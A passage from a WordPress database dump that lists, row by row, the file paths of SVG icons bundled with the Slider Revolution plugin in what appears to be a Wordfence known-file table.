(1785, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_data_setting_24px.svg'),
(1786, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_device_information_24px.svg'),
(1787, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_identity_24px.svg'),
(1788, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_media_24px.svg'),
(1789, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_phone_msg_24px.svg'),
(1790, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_scan_wifi_24px.svg'),
(1791, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pets_24px.svg'),
(1792, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_picture_in_picture_24px.svg'),
(1793, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_picture_in_picture_alt_24px.svg'),
(1794, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_play_for_work_24px.svg'),
(1795, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_polymer_24px.svg'),
(1796, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_power_settings_new_24px.svg'),
(1797, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_pregnant_woman_24px.svg'),
(1798, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_print_24px.svg'),
(1799, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_query_builder_24px.svg'),
(1800, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_question_answer_24px.svg'),
(1801, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_receipt_24px.svg'),
(1802, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_record_voice_over_24px.svg'),
(1803, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_redeem_24px.svg'),
(1804, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_reorder_24px.svg'),
(1805, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_report_problem_24px.svg'),
(1806, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_restore_24px.svg'),
(1807, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_room_24px.svg'),
(1808, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_rounded_corner_24px.svg'),
(1809, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_rowing_24px.svg'),
(1810, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_schedule_24px.svg'),
(1811, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_search_24px.svg'),
(1812, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_24px.svg'),
(1813, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_applications_24px.svg'),
(1814, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_backup_restore_24px.svg'),
(1815, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_bluetooth_24px.svg'),
(1816, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_brightness_24px.svg'),
(1817, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_cell_24px.svg'),
(1818, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_ethernet_24px.svg'),
(1819, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_antenna_24px.svg'),
(1820, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_component_24px.svg'),
(1821, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_composite_24px.svg'),
(1822, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_hdmi_24px.svg'),
(1823, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_svideo_24px.svg'),
(1824, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_overscan_24px.svg'),
(1825, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_phone_24px.svg'),
(1826, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_power_24px.svg'),
(1827, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_remote_24px.svg'),
(1828, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_voice_24px.svg'),
(1829, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_24px.svg'),
(1830, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_two_24px.svg'),
(1831, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_basket_24px.svg'),
(1832, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shopping_cart_24px.svg'),
(1833, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_speaker_notes_24px.svg'),
(1834, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_spellcheck_24px.svg'),
(1835, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_stars_24px.svg'),
(1836, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_store_24px.svg'),
(1837, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_subject_24px.svg'),
(1838, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_supervisor_account_24px.svg'),
(1839, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_horiz_24px.svg'),
(1840, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vert_24px.svg'),
(1841, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vertical_circle_24px.svg'),
(1842, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_system_update_alt_24px.svg'),
(1843, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_24px.svg'),
(1844, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_tab_unselected_24px.svg'),
(1845, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_theaters_24px.svg'),
(1846, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumb_down_24px.svg'),
(1847, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumb_up_24px.svg'),
(1848, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_thumbs_up_down_24px.svg'),
(1849, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_timeline_24px.svg'),
(1850, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_toc_24px.svg'),
(1851, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_today_24px.svg'),
(1852, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_toll_24px.svg'),
(1853, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_touch_app_24px.svg'),
(1854, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_track_changes_24px.svg'),
(1855, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_translate_24px.svg'),
(1856, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_down_24px.svg'),
(1857, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_flat_24px.svg'),
(1858, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_trending_up_24px.svg'),
(1859, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_turned_in_24px.svg'),
(1860, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_turned_in_not_24px.svg'),
(1861, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_update_24px.svg'),
(1862, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_verified_user_24px.svg'),
(1863, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_agenda_24px.svg'),
(1864, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_array_24px.svg'),
(1865, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_carousel_24px.svg'),
(1866, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_column_24px.svg'),
(1867, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_day_24px.svg'),
(1868, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_headline_24px.svg'),
(1869, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_list_24px.svg'),
(1870, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_module_24px.svg'),
(1871, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_quilt_24px.svg'),
(1872, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_stream_24px.svg'),
(1873, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_view_week_24px.svg'),
(1874, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_visibility_24px.svg'),
(1875, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_visibility_off_24px.svg'),
(1876, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_watch_later_24px.svg'),
(1877, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_work_24px.svg'),
(1878, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_youtube_searched_for_24px.svg'),
(1879, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_in_24px.svg'),
(1880, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_zoom_out_24px.svg'),
(1881, 'wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_add_alert_24px.svg'),
(1882, 'wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_error_24px.svg'),
(1883, 'wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_error_outline_24px.svg'),
(1884, 'wp-content/plugins/revslider/public/assets/assets/svg/alert/ic_warning_24px.svg'),
(1885, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_add_to_queue_24px.svg'),
(1886, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_airplay_24px.svg'),
(1887, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_album_24px.svg'),
(1888, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_art_track_24px.svg'),
(1889, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_av_timer_24px.svg'),
(1890, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_closed_caption_24px.svg'),
(1891, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_equalizer_24px.svg'),
(1892, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_explicit_24px.svg'),
(1893, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fast_forward_24px.svg'),
(1894, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fast_rewind_24px.svg'),
(1895, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_dvr_24px.svg'),
(1896, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_manual_record_24px.svg'),
(1897, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_new_24px.svg'),
(1898, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_pin_24px.svg'),
(1899, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_fiber_smart_record_24px.svg'),
(1900, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_10_24px.svg'),
(1901, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_30_24px.svg'),
(1902, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_forward_5_24px.svg'),
(1903, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_games_24px.svg'),
(1904, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hd_24px.svg'),
(1905, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_hearing_24px.svg'),
(1906, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_high_quality_24px.svg'),
(1907, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_add_24px.svg'),
(1908, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_books_24px.svg'),
(1909, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_library_music_24px.svg'),
(1910, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_loop_24px.svg'),
(1911, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_24px.svg'),
(1912, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_none_24px.svg'),
(1913, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_mic_off_24px.svg'),
(1914, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_movie_24px.svg'),
(1915, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_music_video_24px.svg'),
(1916, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_new_releases_24px.svg'),
(1917, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_not_interested_24px.svg'),
(1918, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_24px.svg'),
(1919, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_circle_filled_24px.svg'),
(1920, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_pause_circle_outline_24px.svg'),
(1921, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_arrow_24px.svg'),
(1922, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_circle_filled_24px.svg'),
(1923, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_play_circle_outline_24px.svg'),
(1924, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_add_24px.svg'),
(1925, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_add_check_24px.svg'),
(1926, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_playlist_play_24px.svg'),
(1927, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_24px.svg'),
(1928, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_music_24px.svg'),
(1929, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_play_next_24px.svg'),
(1930, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_radio_24px.svg'),
(1931, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_recent_actors_24px.svg'),
(1932, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_remove_from_queue_24px.svg'),
(1933, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_24px.svg'),
(1934, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_repeat_one_24px.svg'),
(1935, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_10_24px.svg'),
(1936, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_24px.svg'),
(1937, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_30_24px.svg'),
(1938, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_replay_5_24px.svg'),
(1939, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_shuffle_24px.svg'),
(1940, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_skip_next_24px.svg'),
(1941, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_skip_previous_24px.svg'),
(1942, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_slow_motion_video_24px.svg'),
(1943, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_snooze_24px.svg'),
(1944, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_sort_by_alpha_24px.svg'),
(1945, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_stop_24px.svg'),
(1946, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_subscriptions_24px.svg'),
(1947, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_subtitles_24px.svg'),
(1948, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_surround_sound_24px.svg'),
(1949, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_video_library_24px.svg'),
(1950, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_videocam_24px.svg'),
(1951, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_videocam_off_24px.svg'),
(1952, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_down_24px.svg'),
(1953, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_mute_24px.svg'),
(1954, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_off_24px.svg'),
(1955, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_up_24px.svg'),
(1956, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_web_24px.svg'),
(1957, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_web_asset_24px.svg'),
(1958, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/NewTux.svg'),
(1959, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/abacus.svg'),
(1960, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/address-book.svg'),
(1961, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/address-book2.svg'),
(1962, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/aim.svg'),
(1963, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/alarm.svg'),
(1964, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/apple.svg'),
(1965, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-left.svg'),
(1966, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrow-right.svg'),
(1967, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/arrows-updown.svg'),
(1968, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/atm-cash.svg'),
(1969, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award1.svg'),
(1970, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award2.svg'),
(1971, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award3.svg'),
(1972, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award4.svg'),
(1973, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/award5.svg'),
(1974, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge01.svg'),
(1975, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/badge02.svg'),
(1976, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank.svg'),
(1977, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bank2.svg'),
(1978, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bell.svg'),
(1979, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/binoculars.svg'),
(1980, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bomb.svg'),
(1981, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bonsai.svg'),
(1982, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book-apple.svg'),
(1983, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/book.svg'),
(1984, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/bookmark.svg'),
(1985, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/box.svg'),
(1986, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/brain.svg'),
(1987, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/briefcase.svg'),
(1988, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/browser01.svg'),
(1989, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/browser02.svg'),
(1990, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/buildings.svg'),
(1991, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/buy-sign.svg'),
(1992, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator1.svg'),
(1993, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator2.svg'),
(1994, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calculator3.svg'),
(1995, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar1.svg'),
(1996, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar2.svg'),
(1997, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar3.svg'),
(1998, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar4.svg'),
(1999, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/calendar5.svg'),
(2000, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/certificate.svg'),
(2001, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/champagne.svg'),
(2002, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character01.svg'),
(2003, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character02.svg'),
(2004, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character03.svg'),
(2005, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character04.svg'),
(2006, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character05.svg'),
(2007, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character06.svg'),
(2008, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character07.svg'),
(2009, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/character08.svg'),
(2010, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart-analysis.svg'),
(2011, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart-board.svg'),
(2012, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart-pyramid.svg'),
(2013, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart01.svg'),
(2014, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart02.svg'),
(2015, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart03.svg'),
(2016, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart04.svg'),
(2017, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart05.svg'),
(2018, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart06.svg'),
(2019, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart07.svg'),
(2020, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart08.svg'),
(2021, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart09.svg'),
(2022, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart10.svg'),
(2023, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart11.svg'),
(2024, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart12.svg'),
(2025, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart13.svg'),
(2026, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart14.svg'),
(2027, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart15.svg'),
(2028, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart16.svg'),
(2029, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart17.svg'),
(2030, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart18.svg'),
(2031, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart19.svg'),
(2032, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart20.svg'),
(2033, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart21.svg'),
(2034, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chat.svg'),
(2035, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist.svg'),
(2036, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist2.svg');
INSERT INTO `zdenl_wfknownfilelist` (`id`, `path`) VALUES
(2037, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/checklist3.svg'),
(2038, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chemistry.svg'),
(2039, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess-knight.svg'),
(2040, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess-rook.svg'),
(2041, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess.svg'),
(2042, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/clock.svg'),
(2043, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/closed-sign.svg'),
(2044, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-coins.svg'),
(2045, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-down.svg'),
(2046, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/cloud-up.svg'),
(2047, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coffee.svg'),
(2048, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/conference.svg'),
(2049, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/contact-book.svg'),
(2050, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/coupon.svg'),
(2051, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/credit-card.svg'),
(2052, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/crown.svg'),
(2053, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/currencies.svg'),
(2054, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/database.svg'),
(2055, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/delivery.svg'),
(2056, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/diagram-hierarchy.svg'),
(2057, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/diamond.svg'),
(2058, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/dollar.svg'),
(2059, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/drawer.svg'),
(2060, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/egg.svg'),
(2061, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/emblem.svg'),
(2062, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/envelope-money.svg'),
(2063, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/envelopes.svg'),
(2064, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/euro.svg'),
(2065, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/exchange.svg'),
(2066, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/exit.svg'),
(2067, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/factory.svg'),
(2068, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fax.svg'),
(2069, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file01.svg'),
(2070, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file02.svg'),
(2071, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file03.svg'),
(2072, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file04.svg'),
(2073, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file05.svg'),
(2074, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file06.svg'),
(2075, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file07.svg'),
(2076, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file08.svg'),
(2077, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file09.svg'),
(2078, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file10.svg'),
(2079, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/files.svg'),
(2080, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fire.svg'),
(2081, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/fish.svg'),
(2082, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/flag.svg'),
(2083, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-add.svg'),
(2084, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-delete.svg'),
(2085, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-online.svg'),
(2086, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-private.svg'),
(2087, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-remove.svg'),
(2088, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder.svg'),
(2089, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folders.svg'),
(2090, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/funnel-money.svg'),
(2091, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/funnel.svg'),
(2092, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gauge.svg'),
(2093, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/gauge2.svg'),
